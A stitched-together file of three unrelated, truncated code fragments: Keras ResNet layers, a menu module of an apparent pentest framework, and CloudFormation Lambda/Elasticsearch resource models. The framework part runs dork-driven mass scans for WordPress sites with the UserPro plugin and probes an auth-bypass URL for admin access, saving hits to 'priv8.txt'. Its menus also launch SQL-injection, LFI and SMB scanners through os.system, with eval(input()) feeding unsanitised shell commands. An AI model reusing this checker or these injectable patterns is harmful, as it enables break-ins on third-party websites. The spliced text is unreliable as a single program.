config.update({'filter_size': self.filter_size, 'kernel_size': self.kernel_size, 'strides': self.strides})
return config
@tf.keras.utils.register_keras_serializable()
class ResnetIdentityBlock(tfl.Layer):
def __init__(self, filters, kernel_size=3, use_bias=True,
train_bn=True, name='resnet_identity_block', **kwargs):
"""
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
Args:
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
use_bias: Boolean. To use or not use a bias in conv layers.
name: block name
**kwargs:
"""
super(ResnetIdentityBlock, self).__init__(name=name, **kwargs)
self.filters = filters
self.kernel_size = kernel_size
filters1, filters2, filters3 = self.filters
self.conv2a = tf.keras.layers.Conv2D(filters=filters1, kernel_size=(1, 1), use_bias=use_bias)
self.bn2a = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2b = tf.keras.layers.Conv2D(filters=filters2, kernel_size=self.kernel_size, padding='same',
use_bias=use_bias)
self.bn2b = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2c = tf.keras.layers.Conv2D(filters=filters3, kernel_size=(1, 1), use_bias=use_bias)
self.bn2c = tf.keras.layers.BatchNormalization(trainable=train_bn)
def build(self, input_shape):
self.built = True
super(ResnetIdentityBlock, self).build(input_shape)
def call(self, inputs, **kwargs):
x = self.conv2a(inputs)
x = self.bn2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x)
x = tf.nn.relu(x)
x = self.conv2c(x)
x = self.bn2c(x)
x += inputs
return tf.nn.relu(x)
def get_config(self):
config = super(ResnetIdentityBlock, self).get_config()
config.update({'kernel_size': self.kernel_size, 'filters': self.filters})
return config
@tf.keras.utils.register_keras_serializable()
class ResNetIdentityBlockSmall(tfl.Layer):
def __init__(self, filter_size, kernel_size, use_bias=True,
train_bn=True, name='resnet_identity_block_small', **kwargs):
super(ResNetIdentityBlockSmall, self).__init__(name=name, **kwargs)
self.filter_size = filter_size
self.kernel_size = kernel_size
self.conv2a = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=self.kernel_size, use_bias=use_bias)
self.bn2a = tf.keras.layers.BatchNormalization(trainable=train_bn)
self.conv2b = tf.keras.layers.Conv2D(filters=self.filter_size, kernel_size=self.kernel_size, use_bias=use_bias)
self.bn2b = tf.keras.layers.BatchNormalization(trainable=train_bn)
def build(self, input_shape):
self.built = True
super(ResNetIdentityBlockSmall, self).build(input_shape)
def call(self, inputs, **kwargs):
x = self.conv2a(inputs)
x = self.bn2a(x)
x = tf.nn.relu(x)
x = self.conv2b(x)
x = self.bn2b(x)
x += inputs
return tf.nn.relu(x)
def get_config(self):
config = super(ResNetIdentityBlockSmall, self).get_config()
config.update({'filter_size': self.filter_size, 'kernel_size': self.kernel_size, })
return config
@tf.keras.utils.register_keras_serializable()
class ResNetLayer(tfl.Layer):
def __init__(self, resnet_type, train_bn, name='resnet_layer', stage5=False, **kwargs):
"""
Build a ResNet graph. https://arxiv.org/pdf/1512.03385.pdf
Args:
resnet_type: model type
name:
train_bn:
stage5:
**kwargs:
"""
super(ResNetLayer, self).__init__(name=name, **kwargs)
self.resnet_type = resnet_type
self.stage5 = stage5
self.stage4_identity_count = {
'resnet18': 1,
'resnet34': 5,
'resnet50': 5,
'resnet101': 22}
assert self.resnet_type in [f'resnet{i}' for i in [18, 34, 50, 101]]
# Stage 1
self.zero_pad = tfl.ZeroPadding2D((3, 3))
self.conv1 = tfl.Conv2D(filters=64, kernel_size=(7, 7), strides=(2, 2), name='conv1', use_bias=True)
self.bn_conv1 = tfl.BatchNormalization(name='bn_conv1', trainable=train_bn)
self.maxpool1 = tfl.MaxPooling2D((3, 3), strides=(2, 2), padding="same")
self.relu = tfl.Activation('relu')
self.stages_dict = dict()
if self.resnet_type in ['resnet50', 'resnet101']:
# Stage 2
self.resnet_conv2a = ResnetConvBlock(filters=[64, 64, 256], kernel_size=3, strides=(1, 1),
train_bn=train_bn,
name='resnet_conv2a')
self.resnet_identity2b = ResnetIdentityBlock(filters=[64, 64, 256], kernel_size=3, train_bn=train_bn,
name='resnet_identity2b')
self.resnet_identity2c = ResnetIdentityBlock(filters=[64, 64, 256], kernel_size=3, train_bn=train_bn,
name='resnet_identity2c')
# Stage 3
self.resnet_conv3a = ResnetConvBlock(filters=[128, 128, 512], kernel_size=3, train_bn=train_bn,
name='resnet_conv3a')
self.resnet_identity3b = ResnetIdentityBlock(filters=[128, 128, 512], kernel_size=3, train_bn=train_bn,
name='resnet_identity3b')
self.resnet_identity3c = ResnetIdentityBlock(filters=[128, 128, 512], kernel_size=3, train_bn=train_bn,
name='resnet_identity3c')
self.resnet_identity3d = ResnetIdentityBlock(filters=[128, 128, 512], kernel_size=3, train_bn=train_bn,
name='resnet_identity3d')
# Stage 4
self.resnet_conv4a = ResnetConvBlock(filters=[256, 256, 1024], kernel_size=3, train_bn=train_bn)
self.resnet_identity4_list = []
for i in range(self.stage4_identity_count[self.resnet_type]):
self.resnet_identity4_list.append(ResnetIdentityBlock(
filters=[256, 256, 1024], kernel_size=3, train_bn=train_bn)
)
# Stage 5
if self.stage5:
self.resnet_conv5a = ResnetConvBlock(filters=[512, 512, 2048], kernel_size=3, train_bn=train_bn)
self.resnet_identity5b = ResnetIdentityBlock(filters=[512, 512, 2048], kernel_size=3, train_bn=train_bn)
self.resnet_identity5c = ResnetIdentityBlock(filters=[512, 512, 2048], kernel_size=3, train_bn=train_bn)
elif self.resnet_type == 'resnet34':
# Stage 2
self.resnet_conv2a = ResnetConvBlockSmall(
filter_size=64, kernel_size=3, strides=(1, 1), train_bn=True, name='resnet_conv2a')
self.resnet_identity2b = ResNetIdentityBlockSmall(
filter_size=64, kernel_size=1, train_bn=True, name='resnet_identity2b')
self.resnet_identity2c = ResNetIdentityBlockSmall(
filter_size=64, kernel_size=1, train_bn=True, name='resnet_identity2b')
# Stage 3
self.resnet_conv3a = ResnetConvBlockSmall(
filter_size=128, kernel_size=3, train_bn=True, name='resnet_conv3a')
self.resnet_identity3b = ResNetIdentityBlockSmall(
filter_size=128, kernel_size=1, train_bn=True, name='resnet_identity3b')
self.resnet_identity3c = ResNetIdentityBlockSmall(
filter_size=128, kernel_size=1, train_bn=True, name='resnet_identity3c')
self.resnet_identity3d = ResNetIdentityBlockSmall(
filter_size=128, kernel_size=1, train_bn=True, name='resnet_identity3d')
# Stage 4
self.resnet_conv4a = ResnetConvBlockSmall(
filter_size=256, kernel_size=3, train_bn=True, name='resnet_conv4a')
self.resnet_identity4_list = []
for i in range(self.stage4_identity_count[self.resnet_type]):
self.resnet_identity4_list.append(
ResNetIdentityBlockSmall(filter_size=256, kernel_size=1, train_bn=True))
# Stage 5
if self.stage5:
self.resnet_conv5a = ResnetConvBlockSmall(
filter_size=512, kernel_size=3, train_bn=True, name='resnet_conv5a')
self.resnet_identity5b = ResNetIdentityBlockSmall(
filter_size=512, kernel_size=1, train_bn=True, name='resnet_identity5b')
self.resnet_identity5c = ResNetIdentityBlockSmall(
filter_size=512, kernel_size=1, train_bn=True, name='resnet_identity5c')
elif self.resnet_type == 'resnet18':
# Stage 2
self.resnet_conv2a = ResnetConvBlockSmall(
filter_size=64, kernel_size=3, strides=(1, 1), train_bn=True, name='resnet_conv2a')
self.resnet_identity2b = ResNetIdentityBlockSmall(
filter_size=64, kernel_size=1, train_bn=True, name='resnet_identity2b')
# Stage 3
self.resnet_conv3a = ResnetConvBlockSmall(
filter_size=128, kernel_size=3, train_bn=True, name='resnet_conv3a')
self.resnet_identity3b = ResNetIdentityBlockSmall(
filter_size=128, kernel_size=1, train_bn=True, name='resnet_identity3b')
# Stage 4
self.resnet_conv4a = ResnetConvBlockSmall(filter_size=256, kernel_size=3, train_bn=True,
name='resnet_conv4a')
self.resnet_identity4b = ResNetIdentityBlockSmall(filter_size=256, kernel_size=1, train_bn=True,
name='resnet_identity4b')
# Stage 5
if self.stage5:
self.resnet_conv5a = ResnetConvBlockSmall(
filter_size=512, kernel_size=3, train_bn=True, name='resnet_conv5a')
self.resnet_identity5b = ResNetIdentityBlockSmall(
filter_size=512, kernel_size=1, train_bn=True, name='resnet_identity5b')
def build(self, input_shape):
self.built = True
super(ResNetLayer, self).build(input_shape)
def call(self, inputs, **kwargs):
# outputs comments here are for paper resize 224x224
features_dict = {}
# Stage 1
x = self.zero_pad(inputs)
x = self.conv1(x)
x = self.bn_conv1(x)
x = self.relu(x)
x = self.maxpool1(x) # output: (n, 56, 56, 64)
features_dict.update({'C1': x})
if self.resnet_type in ['resnet50', 'resnet101']:
# Stage 2
x = self.resnet_conv2a(x)
x = self.resnet_identity2b(x)
x = self.resnet_identity2c(x) # output: (n, 56, 56, 256)
features_dict.update({'C2': x})
# Stage 3
x = self.resnet_conv3a(x)
x = self.resnet_identity3b(x)
x = self.resnet_identity3c(x)
x = self.resnet_identity3d(x) # output: (n, 28, 28, 512)
features_dict.update({'C3': x})
# Stage 4
x = self.resnet_conv4a(x)
for layer in self.resnet_identity4_list:
x = layer(x)
# output: (1, 14, 14, 1024)
features_dict.update({'C4': x})
# Stage 5
features_dict.update({'C5': None})
if self.stage5:
x = self.resnet_conv5a(x)
x = self.resnet_identity5b(x)
x = self.resnet_identity5c(x) # output: # (n, 7, 7, 2048)
features_dict.update({'C5': x})
elif self.resnet_type == 'resnet34':
# Stage 2
x = self.resnet_conv2a(x)
x = self.resnet_identity2b(x)
x = self.resnet_identity2c(x)
features_dict.update({'C2': x}) # output: (n, 56, 56, 64)
# Stage 3
x = self.resnet_conv3a(x)
x = | |
if (element.startswith("https://")):
element = element[8:]
if (element.startswith("www.")):
element = element[4:]
element=element[:element.find("/")]
element="http://"+element
print(("checking "+element+" :"))
if (checkwp(element)):
suc = str(checkVul(element))
if( suc=="True"):
try:
filee = open("priv8.txt", mode="a+")
filee.write(element+"\n")
filee.close()
except:
print((""+R+"error"+N+""))
print (suc)
else:
print((""+R+"False"+N+""))
else:
print((element + ""+R+" =>"+N+" " + str(checkwp(element))))
def checkwp(url):
url+="/wp-content/plugins/userpro/css/userpro.min.css"
try:
pURL = urlopen(url).read()
except:
return False
if (pURL.find(".userpro")>-1):
print((""+B+"[!] "+N+" Plugin is installed checking vulnerable...\n"))
return True
else:
return False
def checkVul(url):
url1=url + "/?up_auto_log=true"
try:
pURL = urlopen(url1).read()
if (pURL.find("admin-bar-css")>-1):
return True
elif (urlopen(url + "/wp-admin").read().find("admin-bar-css")>-1):
return True
else :return False
except:
return False
while(True):
x = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/usr_pro_wordpress_auto_find (set Dork)"+N+"): "))
print(("DORKS => "+R+"",x))
n= eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/usr_pro_wordpress_auto_find (start number)"+N+"): "))
print(("START NUMBER => "+R+"",n))
g= eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/usr_pro_wordpress_auto_find (set end_number)"+N+"): "))
print(("END NUMBER => "+R+"",g))
run = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/usr_pro_wordpress_auto_find"+N+"): "))
if run == "run":
print((""+B+"[*] "+N+"Starting attacks..."))
while(True):
tracker(x, n)
y=eval(input(""+B+"[*]"+N+" Next (y/n)?"))
if(y=="y"):
n+=g;
tracker(x, n)
else:
core.menu.scan()
y1=eval(input(""+B+"[*]"+N+" Anouther dork (y/n) ?"))
if (y1 == "y"):
continue
else:
core.menu.scan()
elif wor == 'clear':
clean()
wordpress()
elif wor =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", wor))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress()
pass
def cms():
while True:
cs = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/cms_war "+N+"): "))
if cs == 'show options':
help.option()
cms()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif cs == 'set target':
tops = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/cms_war (set target)"+N+"): "))
print(("target =>"+R+"" ,tops))
print((""+N+"=> "+R+"scan "+N+"[dir, shell, backup, files, admin]"))
ray = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/cms_war (scan)"+N+"): "))
gay = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/cms_war"+N+"): "))
if gay == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd scanner;python scanner.py %s -m %s" % (tops,ray))
print((""+B+"[*]"+N+" Job finished!"))
print()
cms()
else:
cms()
elif cs =='back':
core.menu.scan()
elif cs =='clear':
clean()
cms()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
cms()
pass
def drupal_scan():
cs = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/drupal_scan "+N+"): "))
if cs == 'show options':
help.option()
drupal_scan()
elif cs == 'set target':
ip=eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/drupal_scan "+G+"(set target)"+G+"): "))
print(('Start scan target %s',ip))
os.system("droopescan scan drupal -u %s" % (ip))
drupal_scan()
elif cs =='back':
core.menu.scan()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif cs =='clear':
clean()
drupal_scan()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
drupal_scan()
pass
def wordpress1():
cs = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_scan "+N+"): "))
if cs == 'show options':
help.option()
wordpress1()
elif cs == 'set target':
ip=eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_scan "+G+"(set target)"+G+"): "))
os.system("droopescan scan wordpress -u %s" % (ip))
wordpress1()
elif cs =='back':
core.menu.scan()
elif cs =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif cs =='clear':
clean()
wordpress1()
else:
print(("Wrong Command => ", cs))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress1()
pass
def wordpress_scan():
while True:
sec = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_user_scanners"+N+"): "))
if sec == 'show options':
help.option()
wordpress_scan()
elif sec =='back':
core.menu.scan()
elif sec =='set target':
wop = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_user_scanners (target)"+N+"): "))
enum = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_user_scanners (user)"+N+"): "))
uiop = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/wordpress_user_scanners"+N+"): "))
if uiop == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd wscan;python wpscanner.py -s %s -n %s" % (wop,enum))
print((""+B+"[*]"+N+" Job finished!"))
print()
wordpress_scan()
else:
wordpress_scan()
elif sec == 'clear':
clean()
wordpress_scan()
elif sec =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", sec))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
wordpress_scan()
pass
def dirse():
while True:
dir = eval(input("Pentest>> ("+B+"modules/scanners)("+R+"scanner/dir_search"+N+"): "))
if dir == 'show options':
help.option()
dirse()
elif dir =='back':
core.menu.scan()
elif dir =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif dir == 'set target':
ym = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/dir_search (set target)"+N+"): "))
print(("target => "+R+"",ym))
puki = eval(input("Pentest>> ("+B+"modules/scanners)("+R+"scanner/dir_search (set extensions)"+N+"): "))
dih = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/dir_search"+N+"): "))
if dih == "run":
os.system("python3 modules/dirsearch/dirsearch.py -u %s -e %s" % (ym,puki))
print((""+B+"[*]"+N+" Job finished!"))
print()
dirse()
else:
dirse()
elif dir =='clear':
clean()
dirse()
else:
print(("Wrong Command => ", dir))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
dirse()
pass
def lfi():
while True:
lf = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/lfi_scanner"+N+"): "))
if lf == 'show options':
help.option()
lfi()
elif lf =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif lf == 'back':
core.menu.scan()
elif lf == 'set target':
os.system("cd modules;cd lfi_scanners;perl lfi_scanner.pl")
print((""+B+"[*]"+N+" Job finished!"))
print()
lfi()
elif lf == 'clear':
clean()
lfi()
else:
print(("Wrong Command => ", lf))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
lfi()
pass
def port():
while True:
os.system("python modules/port_scanners/port.py")
print((""+B+"[*]"+N+" Job finished!"))
print()
core.menu.scan()
pass
def joomla_sql():
while True:
jo = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_sqli_scanners"+N+"): "))
if jo == 'show options':
help.option()
joomla_sql()
elif jo == 'back':
core.menu.scan()
elif jo == 'set target':
q = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_sqli_scanners (set target)"+N+"): "))
print(("list web => "+R+"",q))
m = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_sqli_scanners"+N+"): "))
if m == "run":
print((""+B+"[*] "+N+"Starting attacks..."))
os.system("cd modules;cd joomla_sqli_scanners;python joomsql.py %s" % (q))
print()
joomla_sql()
else:
joomla_sql()
elif jo == 'clear':
clean()
joomla_sql()
elif jo =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
else:
print(("Wrong Command => ", jo))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
joomla_sql()
pass
def joomscan():
while True:
jaa = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/jomscan_v4"+N+"): "))
if jaa == 'show options':
help.option()
joomscan()
elif jaa =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif jaa == 'back':
core.menu.scan()
elif jaa == 'set target':
ops = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/jomscan_v4 (target)"+N+"): "))
print(("target => "+R+"",ops))
rup = eval(input(""+N+"(Pentest)> ("+B+"modules/scanners)("+R+"scanner/jomscan_v4"+N+"): "))
if rup == "run":
print((""+B+"[*]"+N+" Starting Attacks..."))
os.system("cd modules;cd joomscan_v4;python scan.py %s" % (ops))
print((""+B+"[*]"+N+" Job finished!"))
print()
joomscan()
else:
joomscan()
elif jaa =='clear':
clean()
joomscan()
else:
print(("Wrong Command => ", jaa))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
joomscan()
pass
def scan_v3():
while True:
try:
se =eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"joomla_scanners_v3"+N+"): "))
if se == 'show options':
help.option()
scan_v3()
elif se =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif se == 'back':
core.menu.scan()
elif se == 'set target':
x = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_scanners_v3"+G+" (set target)"+N+"): "))
print(("target => "+R+"",x))
i = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"joomla_scanners_v3"+N+"): "))
if i == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd joomscan_v3;python joomlascanner.py %s" % (x))
print((""+B+"[*]"+N+" Job finished!"))
print()
scan_v3()
else:
scan_v3()
elif se =='clear':
clean()
scan_v3()
else:
print(("Wrong Command => ", se))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
scan_v3()
pass
except(KeyboardInterrupt):
scan_v3()
def scan_v2():
while True:
try:
v2 =eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_scanners_v.2"+N+"): "))
if v2 == 'show options':
help.option()
scan_v2()
elif v2 =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif v2 == 'back':
core.menu.scan()
elif v2 == 'set target':
p = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_scanners_v.2 (set target)"+N+"): "))
print(("target => "+R+"",p))
o = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_scanners_v.2"+N+"): "))
if o == "run":
os.system("cd modules;cd joomscan_v2;python joomlascan2.py %s" % (p))
print((""+B+"[*]"+N+" Job finished!"))
print()
scan_v2()
else:
scan_v2()
elif v2 =='clear':
clean()
scan_v2()
else:
print(("Wrong Command => ", v2))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
scan_v2()
pass
except(KeyboardInterrupt):
scan_v2()
def jomvull():
while True:
try:
j = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/joomla_vulnerability_scanners"+N+"): "))
if j == 'show options':
help.option()
jomvull()
elif j =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif j == 'back':
core.menu.scan()
elif j == 'set target':
os.system("cd modules;cd joomscan;perl joomlavulnerability.pl")
print((""+B+"[*]"+N+" Job finished!"))
print()
jomvull()
elif j =='clear':
clean()
jomvull()
else:
print(("Wrong Command => ", j))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
jomvull()
pass
except(KeyboardInterrupt):
jomvull()
def jdown():
while True:
a = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/jdownloads_scanners"+N+"): "))
if a == 'show options':
help.option()
jdown()
elif a =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif a == 'back':
core.menu.scan()
elif a == 'set target':
li = eval(input(""+N+"(list)> ("+B+"modules/scanners)("+R+"scanner/jdownloads_scanners (set target)"+N+"): "))
print(("list => "+R+"",li))
ruu = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/jdownloads_scanners"+N+"): "))
if ruu == "run":
print((""+B+"[*]"+N+" Starting attacks..."))
os.system("cd modules;cd jdownloads_scanner;perl jdownloads_scanner.pl %s" % (li))
print((""+B+"[*]"+N+" Job finished!"))
print()
jdown()
else:
jdown()
elif a == 'clear':
clean()
jdown()
else:
print(("Wrong Command => ", a))
print((""+N+""+B+"["+R+"!"+B+"] "+N+"Please enter 'show options'"))
jdown()
pass
def smb():
while True:
map =eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/smb_scanning"+N+"): "))
if map == 'show options':
help.option()
smb()
elif map =='exit':
print()
print((""+G+"Thanks for using PTF"))
print()
exit()
elif map == 'back':
core.menu.scan()
elif map =='set target':
target = eval(input(""+N+"Pentest>> ("+B+"modules/scanners)("+R+"scanner/smb_scanning ("+G+"set target)"+N+"): "))
print(("Target => "+R+"",target))
ta = eval(input("Pentest>> ("+B+"modules/scanners)("+R+"scanner/smb_scanning"+N+"): "))
if ta == "run":
scan = os.popen("nmap -p- --script=modules/nse/smb.nse"+ target + " -Pn" ).read()
save = open('log/nmap_vuln.txt','w')
save.write(scan)
save.close()
vuln = os.popen("cat log/nmap_vuln.txt " ).read()
table= [['vulnerable scan result'],[vuln]]
print((tabulate(table,tablefmt="fancy_grid",headers="firstrow")))
smb()
else:
smb()
elif map =='clear':
clean()
smb()
| |
k in props])
update_props = self.resolve_refs_recursively(stack_name, update_props, resources)
if 'Timeout' in update_props:
update_props['Timeout'] = int(update_props['Timeout'])
if 'Code' in props:
code = props['Code'] or {}
if not code.get('ZipFile'):
LOG.debug('Updating code for Lambda "%s" from location: %s' % (props['FunctionName'], code))
client.update_function_code(FunctionName=props['FunctionName'], **code)
if 'Environment' in update_props:
environment_variables = update_props['Environment'].get('Variables', {})
update_props['Environment']['Variables'] = {k: str(v) for k, v in environment_variables.items()}
return client.update_function_configuration(**update_props)
@staticmethod
def get_deploy_templates():
def get_lambda_code_param(params, **kwargs):
code = params.get('Code', {})
zip_file = code.get('ZipFile')
if zip_file and not is_base64(zip_file):
tmp_dir = new_tmp_dir()
handler_file = get_handler_file_from_name(params['Handler'], runtime=params['Runtime'])
tmp_file = os.path.join(tmp_dir, handler_file)
save_file(tmp_file, zip_file)
# add 'cfn-response' module to archive - see:
# https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/cfn-lambda-function-code-cfnresponsemodule.html
cfn_response_tmp_file = get_cfn_response_mod_file()
cfn_response_mod_dir = os.path.join(tmp_dir, 'node_modules', 'cfn-response')
mkdir(cfn_response_mod_dir)
cp_r(cfn_response_tmp_file, os.path.join(cfn_response_mod_dir, 'index.js'))
# create zip file
zip_file = create_zip_file(tmp_dir, get_content=True)
code['ZipFile'] = zip_file
rm_rf(tmp_dir)
return code
def get_delete_params(params, **kwargs):
return {'FunctionName': params.get('FunctionName')}
return {
'create': {
'function': 'create_function',
'parameters': {
'FunctionName': 'FunctionName',
'Runtime': 'Runtime',
'Role': 'Role',
'Handler': 'Handler',
'Code': get_lambda_code_param,
'Description': 'Description',
'Environment': 'Environment',
'Timeout': 'Timeout',
'MemorySize': 'MemorySize',
'Layers': 'Layers'
# TODO add missing fields
},
'defaults': {
'Role': 'test_role'
},
'types': {
'Timeout': int,
'MemorySize': int
}
},
'delete': {
'function': 'delete_function',
'parameters': get_delete_params
}
}
class LambdaFunctionVersion(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::Version'
def fetch_state(self, stack_name, resources):
name = self.resolve_refs_recursively(stack_name, self.props.get('FunctionName'), resources)
if not name:
return None
func_name = aws_stack.lambda_function_name(name)
func_version = name.split(':')[7] if len(name.split(':')) > 7 else '$LATEST'
versions = aws_stack.connect_to_service('lambda').list_versions_by_function(FunctionName=func_name)
return ([v for v in versions['Versions'] if v['Version'] == func_version] or [None])[0]
class LambdaEventSourceMapping(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::EventSourceMapping'
def fetch_state(self, stack_name, resources):
props = self.props
resource_id = props['FunctionName'] or self.resource_id
source_arn = props.get('EventSourceArn')
resource_id = self.resolve_refs_recursively(stack_name, resource_id, resources)
source_arn = self.resolve_refs_recursively(stack_name, source_arn, resources)
if not resource_id or not source_arn:
raise Exception('ResourceNotFound')
mappings = aws_stack.connect_to_service('lambda').list_event_source_mappings(
FunctionName=resource_id, EventSourceArn=source_arn)
mapping = list(filter(lambda m:
m['EventSourceArn'] == source_arn and m['FunctionArn'] == aws_stack.lambda_function_arn(resource_id),
mappings['EventSourceMappings']))
if not mapping:
raise Exception('ResourceNotFound')
return mapping[0]
def get_physical_resource_id(self, attribute=None, **kwargs):
return self.props.get('UUID')
class LambdaPermission(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::Permission'
def fetch_state(self, stack_name, resources):
props = self.props
func_name = self.resolve_refs_recursively(stack_name, props.get('FunctionName'), resources)
func_arn = aws_stack.lambda_function_arn(func_name)
return self.do_fetch_state(func_name, func_arn)
def do_fetch_state(self, resource_name, resource_arn):
iam = aws_stack.connect_to_service('iam')
props = self.props
policy_name = LAMBDA_POLICY_NAME_PATTERN % resource_name
policy_arn = aws_stack.policy_arn(policy_name)
policy = iam.get_policy(PolicyArn=policy_arn)['Policy']
version = policy.get('DefaultVersionId')
policy = iam.get_policy_version(PolicyArn=policy_arn, VersionId=version)['PolicyVersion']
statements = policy['Document']['Statement']
statements = statements if isinstance(statements, list) else [statements]
principal = props.get('Principal')
existing = [s for s in statements if s['Action'] == props['Action'] and
s['Resource'] == resource_arn and
(not principal or s['Principal'] in [principal, {'Service': principal}, {'Service': [principal]}])]
return existing[0] if existing else None
def get_physical_resource_id(self, attribute=None, **kwargs):
# return statement ID here to indicate that the resource has been deployed
return self.props.get('Sid')
@staticmethod
def get_deploy_templates():
def lambda_permission_params(params, **kwargs):
result = select_parameters('FunctionName', 'Action', 'Principal')(params, **kwargs)
result['StatementId'] = short_uid()
return result
return {
'create': {
'function': 'add_permission',
'parameters': lambda_permission_params
}
}
class LambdaEventInvokeConfig(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Lambda::EventInvokeConfig'
def fetch_state(self, stack_name, resources):
client = aws_stack.connect_to_service('lambda')
props = self.props
result = client.get_function_event_invoke_config(
FunctionName=props.get('FunctionName'), Qualifier=props.get('FunctionName', '$LATEST'))
return result
def get_physical_resource_id(self, attribute=None, **kwargs):
props = self.props
return 'lambdaconfig-%s-%s' % (props.get('FunctionName'), props.get('Qualifier'))
def get_deploy_templates():
return {
'create': {
'function': 'put_function_event_invoke_config'
},
'delete': {
'function': 'delete_function_event_invoke_config',
'parameters': {
'FunctionName': 'FunctionName',
'Qualifier': 'Qualifier'
}
}
}
class ElasticsearchDomain(GenericBaseModel):
@staticmethod
def cloudformation_type():
return 'AWS::Elasticsearch::Domain'
def get_physical_resource_id(self, attribute=None, **kwargs):
domain_name = self._domain_name()
if attribute == 'Arn':
return aws_stack.elasticsearch_domain_arn(domain_name)
return domain_name
def fetch_state(self, stack_name, resources):
domain_name = self._domain_name()
domain_name = self.resolve_refs_recursively(stack_name, domain_name, resources)
return aws_stack.connect_to_service('es').describe_elasticsearch_domain(DomainName=domain_name)
def _domain_name(self):
return self.props.get('DomainName') or self.resource_id
class FirehoseDeliveryStream(GenericBaseModel):
@staticmethod
def cloudformation_type():
